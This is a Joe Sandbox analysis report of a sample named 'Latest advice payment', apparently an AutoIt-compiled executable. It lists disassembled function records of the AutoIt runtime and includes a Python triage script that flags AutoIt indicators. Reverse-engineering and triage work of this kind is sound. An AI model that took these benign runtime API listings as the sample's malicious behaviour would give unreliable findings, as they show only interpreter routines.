                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: ($0$tooltips_class32
                                                            • API String ID: 698492251-4156429822
                                                            • Opcode ID: 02809c86a5d2c01172442e06e12e406fd45c431ea080c6db4df13c02899f1a61
                                                            • Instruction ID: 564145db4821015abd5da8469e6984de364e461b7024a40866fd04f43d976210
                                                            • Opcode Fuzzy Hash: 02809c86a5d2c01172442e06e12e406fd45c431ea080c6db4df13c02899f1a61
                                                            • Instruction Fuzzy Hash: 83B16A71608381AFDB08DF65C888B6ABBE5BF84310F008929F5D99B2A1DB71EC05CF55
                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 005C44AC
                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 005C44D2
                                                            • _wcscpy.LIBCMT ref: 005C4500
                                                            • _wcscmp.LIBCMT ref: 005C450B
                                                            • _wcscat.LIBCMT ref: 005C4521
                                                            • _wcsstr.LIBCMT ref: 005C452C
                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 005C4548
                                                            • _wcscat.LIBCMT ref: 005C4591
                                                            • _wcscat.LIBCMT ref: 005C4598
                                                            • _wcsncpy.LIBCMT ref: 005C45C3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 699586101-1459072770
                                                            • Opcode ID: 0a217d45d1b4e04383c5c84e0032afb7b66a913ce5da93eea1c45ff58b1857e3
                                                            • Instruction ID: b88bf269704f2c12bf43f85f785c97244eef400c2319f96f4dc832d08f16a656
                                                            • Opcode Fuzzy Hash: 0a217d45d1b4e04383c5c84e0032afb7b66a913ce5da93eea1c45ff58b1857e3
                                                            • Instruction Fuzzy Hash: 2F41B332A002027EDB14BA749C5BEBF7FACFF81710F044469FD05B6182EA349A019BA5
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005628BC
                                                            • GetSystemMetrics.USER32(00000007), ref: 005628C4
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005628EF
                                                            • GetSystemMetrics.USER32(00000008), ref: 005628F7
                                                            • GetSystemMetrics.USER32(00000004), ref: 0056291C
                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00562939
                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00562949
                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0056297C
                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00562990
                                                            • GetClientRect.USER32(00000000,000000FF), ref: 005629AE
                                                            • GetStockObject.GDI32(00000011), ref: 005629CA
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 005629D5
                                                              • Part of subcall function 00562344: GetCursorPos.USER32(?), ref: 00562357
                                                              • Part of subcall function 00562344: ScreenToClient.USER32(006257B0,?), ref: 00562374
                                                              • Part of subcall function 00562344: GetAsyncKeyState.USER32(00000001), ref: 00562399
                                                              • Part of subcall function 00562344: GetAsyncKeyState.USER32(00000002), ref: 005623A7
                                                            • SetTimer.USER32(00000000,00000000,00000028,00561256), ref: 005629FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: AutoIt v3 GUI
                                                            • API String ID: 1458621304-248962490
                                                            • Opcode ID: 81e5328c59ac30166918b43a352f54fc844c8af19887a11f6b55914df356a180
                                                            • Instruction ID: 3c87a39c2e30445d20c9980e7fe4811c3af8bd17de3da049904469acf259c0c6
                                                            • Opcode Fuzzy Hash: 81e5328c59ac30166918b43a352f54fc844c8af19887a11f6b55914df356a180
                                                            • Instruction Fuzzy Hash: 1FB18E71A0060ADFDF24DFA8DC89BAD7FB5FB58310F104229FA56AB290DB749841DB50
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 005BA47A
                                                            • __swprintf.LIBCMT ref: 005BA51B
                                                            • _wcscmp.LIBCMT ref: 005BA52E
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 005BA583
                                                            • _wcscmp.LIBCMT ref: 005BA5BF
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 005BA5F6
                                                            • GetDlgCtrlID.USER32(?), ref: 005BA648
                                                            • GetWindowRect.USER32(?,?), ref: 005BA67E
                                                            • GetParent.USER32(?), ref: 005BA69C
                                                            • ScreenToClient.USER32(00000000), ref: 005BA6A3
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 005BA71D
                                                            • _wcscmp.LIBCMT ref: 005BA731
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 005BA757
                                                            • _wcscmp.LIBCMT ref: 005BA76B
                                                              • Part of subcall function 0058362C: _iswctype.LIBCMT ref: 00583634
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                            • String ID: %s%u
                                                            • API String ID: 3744389584-679674701
                                                            • Opcode ID: 556b8c1106ec40cd6cac37d2da796b1b54b53b54c08844388699dca691290d06
                                                            • Instruction ID: a86825fd46e02b398c3749bed814e39287e2911f6ee118131a03cec6e805e648
                                                            • Opcode Fuzzy Hash: 556b8c1106ec40cd6cac37d2da796b1b54b53b54c08844388699dca691290d06
                                                            • Instruction Fuzzy Hash: 4BA1B371204606AFDB19DF64C888FEABBE8FF44354F008529F999D6190DB30F955CB92
                                                            APIs
                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 005BAF18
                                                            • _wcscmp.LIBCMT ref: 005BAF29
                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 005BAF51
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 005BAF6E
                                                            • _wcscmp.LIBCMT ref: 005BAF8C
                                                            • _wcsstr.LIBCMT ref: 005BAF9D
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 005BAFD5
                                                            • _wcscmp.LIBCMT ref: 005BAFE5
                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 005BB00C
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 005BB055
                                                            • _wcscmp.LIBCMT ref: 005BB065
                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 005BB08D
                                                            • GetWindowRect.USER32(00000004,?), ref: 005BB0F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                            • String ID: @$ThumbnailClass
                                                            • API String ID: 1788623398-1539354611
                                                            • Opcode ID: 4aa4d7ad70953f8dea7be44f38ee3d592964130c7b8306c4de12f95f4c2ecfe8
                                                            • Instruction ID: c19c6362cae3721aad642f87aabb8d5fe0a8f99873106d706873a42e9d8061a1
                                                            • Opcode Fuzzy Hash: 4aa4d7ad70953f8dea7be44f38ee3d592964130c7b8306c4de12f95f4c2ecfe8
                                                            • Instruction Fuzzy Hash: 31819E7110820A9BEB05DF14C889BFA7FE8FF94714F048469FD859A091DBB4EE49CB61
                                                            APIs
                                                              • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
                                                            • DragQueryPoint.SHELL32(?,?), ref: 005EC627
                                                              • Part of subcall function 005EAB37: ClientToScreen.USER32(?,?), ref: 005EAB60
                                                              • Part of subcall function 005EAB37: GetWindowRect.USER32(?,?), ref: 005EABD6
                                                              • Part of subcall function 005EAB37: PtInRect.USER32(?,?,005EC014), ref: 005EABE6
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 005EC690
                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 005EC69B
                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 005EC6BE
                                                            • _wcscat.LIBCMT ref: 005EC6EE
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 005EC705
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 005EC71E
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 005EC735
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 005EC757
                                                            • DragFinish.SHELL32(?), ref: 005EC75E
                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 005EC851
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbb
                                                            • API String ID: 169749273-982995565
                                                            • Opcode ID: 3b22a62533faee9dab85cc45a1d9f104259e7b60c84ae39b371ad319f180e7f0
                                                            • Instruction ID: f0cac0fec313a2d29174b57312a823112da74501c96993a0ff8375e3e30fd039
                                                            • Opcode Fuzzy Hash: 3b22a62533faee9dab85cc45a1d9f104259e7b60c84ae39b371ad319f180e7f0
                                                            • Instruction Fuzzy Hash: 36616871108381AFC705EF64D889DAFBFE9FB99350F00092EF591971A1DB709A49CB52
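The two records above are the ones a triager leans on when confirming that this binary is the stock AutoIt3 runtime wrapping a script rather than hand-written code: the CreateWindowExW call at 0056297C registers the window class named "AutoIt v3 GUI", and the WM_DROPFILES (0x0233) handler ending at 005EC851 carries the AutoIt macro names @GUI_DRAGFILE, @GUI_DRAGID and @GUI_DROPID. The following Python is an added example, not tooling from Joe Sandbox or part of this report: it parses function records in this listing's format into per-function structures, decodes the message numbers passed to SendMessageW/DefDlgProcW against a small, partial table of well-known Win32 constants, and flags AutoIt-runtime indicators. SAMPLE is a constructed excerpt of the two records as they appear here; MSG_NAMES and AUTOIT_INDICATORS are the example's own lookup tables and are not exhaustive.

```python
"""Parse Joe Sandbox IDA-plugin function records ("APIs" ... "Instruction Fuzzy Hash")
and flag AutoIt-runtime indicators. Added example; SAMPLE is a constructed excerpt."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• GetSystemMetrics.USER32(00000004), ref: 0056291C
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0056297C
• SendMessageW.USER32(00000000,00000030,00000000), ref: 005629D5
  • Part of subcall function 00562344: GetCursorPos.USER32(?), ref: 00562357
• SetTimer.USER32(00000000,00000000,00000028,00561256), ref: 005629FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
Similarity
• API ID: System$MetricsRectWindow
• String ID: AutoIt v3 GUI
• Opcode ID: 81e5328c59ac30166918b43a352f54fc844c8af19887a11f6b55914df356a180
• Instruction Fuzzy Hash: 1FB18E71A0060ADFDF24DFA8DC89BAD7FB5FB58310F104229FA56AB290DB749841DB50
APIs
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 005EC69B
• _wcscat.LIBCMT ref: 005EC6EE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 005EC705
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 005EC851
Strings
Similarity
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbb
• Opcode ID: 3b22a62533faee9dab85cc45a1d9f104259e7b60c84ae39b371ad319f180e7f0
• Instruction Fuzzy Hash: 36616871108381AFC705EF64D889DAFBFE9FB99350F00092EF591971A1DB709A49CB52
"""

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, Name.MODULE, optional (args), ref: addr
API_RE = re.compile(
    r"^(?P<sub>Part of subcall function [0-9A-F]{8}:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
HEX_RE = re.compile(r"[0-9A-F]{8}")

# Partial table of the message ids seen in this report (example's own lookup, not from the report).
MSG_NAMES = {
    0x0030: "WM_SETFONT", 0x00B0: "EM_GETSEL", 0x00B1: "EM_SETSEL", 0x00C2: "EM_REPLACESEL",
    0x014B: "CB_RESETCONTENT", 0x014E: "CB_SETCURSEL", 0x0233: "WM_DROPFILES",
    0x0411: "TTM_TRACKACTIVATE", 0x0412: "TTM_TRACKPOSITION", 0x0432: "TTM_ADDTOOLW",
}
# Strings that only the AutoIt3 runtime emits (window class of GUICreate(), GUI drop macros,
# and the advanced window-description prefixes used by WinWait/WinActivate and friends).
AUTOIT_INDICATORS = {
    "AutoIt v3 GUI": "window class registered by the AutoIt3 runtime",
    "@GUI_DRAGFILE": "AutoIt GUI drag-and-drop macro",
    "@GUI_DRAGID": "AutoIt GUI drag-and-drop macro",
    "@GUI_DROPID": "AutoIt GUI drag-and-drop macro",
    "[CLASS:": "AutoIt advanced window description",
    "[HANDLE:": "AutoIt advanced window description",
    "[REGEXPTITLE:": "AutoIt advanced window description",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    subcall: bool = False


@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    string_ids: list[str] = field(default_factory=list)
    opcode_id: str = ""
    fuzzy_hash: str = ""


def parse_records(text: str) -> list[FunctionRecord]:
    """Split the listing into records; a record runs from "APIs" to "Instruction Fuzzy Hash"."""
    records: list[FunctionRecord] = []
    cur: FunctionRecord | None = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["mod"], args, m["ref"], bool(m["sub"])))
        elif line.startswith("String ID:"):
            body = line[len("String ID:"):].strip()
            cur.string_ids = [s for s in body.split("$") if s]  # report joins strings with '$'
        elif line.startswith("Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
        elif line.startswith("Instruction Fuzzy Hash:"):
            cur.fuzzy_hash = line.split(":", 1)[1].strip()
            cur = None  # record complete
    return records


def decode_messages(rec: FunctionRecord) -> list[tuple[str, str]]:
    """(ref, message name) for each SendMessageW/DefDlgProcW call whose msg argument is a literal."""
    out = []
    for c in rec.calls:
        if c.name in ("SendMessageW", "SendMessageTimeoutW", "DefDlgProcW") \
                and len(c.args) > 1 and HEX_RE.fullmatch(c.args[1]):
            msg = int(c.args[1], 16)
            out.append((c.ref, MSG_NAMES.get(msg, f"0x{msg:04X}")))
    return out


def autoit_indicators(records: list[FunctionRecord]) -> dict[str, tuple[int, str]]:
    """Map each matched indicator to (record index, reason); checks String IDs and window classes."""
    hits: dict[str, tuple[int, str]] = {}
    for i, rec in enumerate(records):
        texts = list(rec.string_ids)
        texts += [c.args[1] for c in rec.calls if c.name == "CreateWindowExW" and len(c.args) > 1]
        for t in texts:
            for key, why in AUTOIT_INDICATORS.items():
                if t.startswith(key):
                    hits.setdefault(key, (i, why))
    return hits


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for i, r in enumerate(recs):
        print(f"record {i}: {len(r.calls)} calls, messages={decode_messages(r)}, strings={r.string_ids}")
    for key, (idx, why) in autoit_indicators(recs).items():
        print(f"AutoIt indicator {key!r} in record {idx}: {why}")
```

Run it against a saved copy of the report's API listing to get the same per-function summary for every record; a fuzzy-hash or opcode-ID match against a clean AutoIt3 interpreter of the same version would then let you set these runtime functions aside and concentrate on the script payload.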
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                            • API String ID: 1038674560-1810252412
                                                            • Opcode ID: b2b5c8169946bf5da8fc5f0b23599656d1b10010468ff958a4db7af56c204f5f
                                                            • Instruction ID: ed7001805294d052a094006b9727b4df704b92ac6ae9eded84535733ee705c07
                                                            • Instruction Fuzzy Hash: 45316F3198820AAADB14FA60DD0BEEE7F75BF50710F640519B841720E1FF617F44C656
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 005D5013
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 005D501E
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 005D5029
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 005D5034
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 005D503F
                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 005D504A
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 005D5055
                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 005D5060
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 005D506B
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 005D5076
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 005D5081
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 005D508C
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 005D5097
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 005D50A2
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 005D50AD
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 005D50B8
                                                            • GetCursorInfo.USER32(?), ref: 005D50C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$Info
                                                            • String ID:
                                                            • API String ID: 2577412497-0
                                                            • Opcode ID: aac8ffe961fdf2373e410d5477889524c1e39757d412fdfcf1e2c05deaec3f5e
                                                            • Instruction ID: 7d3fc78d786ccf5c2203859b28298b46e424bd7775dd4bb9549b89004579c73f
                                                            • Instruction Fuzzy Hash: 1531D6B1D483196ADF209FBA8C8995EBFE8FF04750F50453BA54DE7280DA786504CF91
                                                            APIs
                                                            • _memset.LIBCMT ref: 005EA259
                                                            • DestroyWindow.USER32(?,?), ref: 005EA2D3
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 005EA34D
                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 005EA36F
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005EA382
                                                            • DestroyWindow.USER32(00000000), ref: 005EA3A4
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00560000,00000000), ref: 005EA3DB
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005EA3F4
                                                            • GetDesktopWindow.USER32 ref: 005EA40D
                                                            • GetWindowRect.USER32(00000000), ref: 005EA414
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 005EA42C
                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 005EA444
                                                              • Part of subcall function 005625DB: GetWindowLongW.USER32(?,000000EB), ref: 005625EC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                            • String ID: 0$tooltips_class32
                                                            • API String ID: 1297703922-3619404913
                                                            • Opcode ID: dc8971f383f932cda47b462b498ba6ed433be08d8f89cb10895b0c6b54099258
                                                            • Instruction ID: 3d770e734a2af088339a363dd5918c5624affb4370a3a0f991bf6a2e86548459
                                                            • Instruction Fuzzy Hash: 2F719070140685AFDB29DF28CC49F667BE6FB88304F04491DF9C59B2A0DBB4E906DB52
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 005E4424
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005E446F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 3974292440-4258414348
                                                            • Opcode ID: 4c18794cc8296e35d233a98f70507bf7fb60bbd723b73d251e4845b00d9414b9
                                                            • Instruction ID: 6cb94603109e5edcce54cfcf4ff41b124b26d3436dbd17fa1709a48d155571a0
                                                            • Instruction Fuzzy Hash: D5914C752043429BCB08EF11C455A6EBFE5BF95350F144868F8D65B3A2CB31ED49CB91
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 005EB8B4
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,005E91C2), ref: 005EB910
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005EB949
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 005EB98C
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005EB9C3
                                                            • FreeLibrary.KERNEL32(?), ref: 005EB9CF
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 005EB9DF
                                                            • DestroyIcon.USER32(?,?,?,?,?,005E91C2), ref: 005EB9EE
                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 005EBA0B
                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 005EBA17
                                                              • Part of subcall function 00582EFD: __wcsicmp_l.LIBCMT ref: 00582F86
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
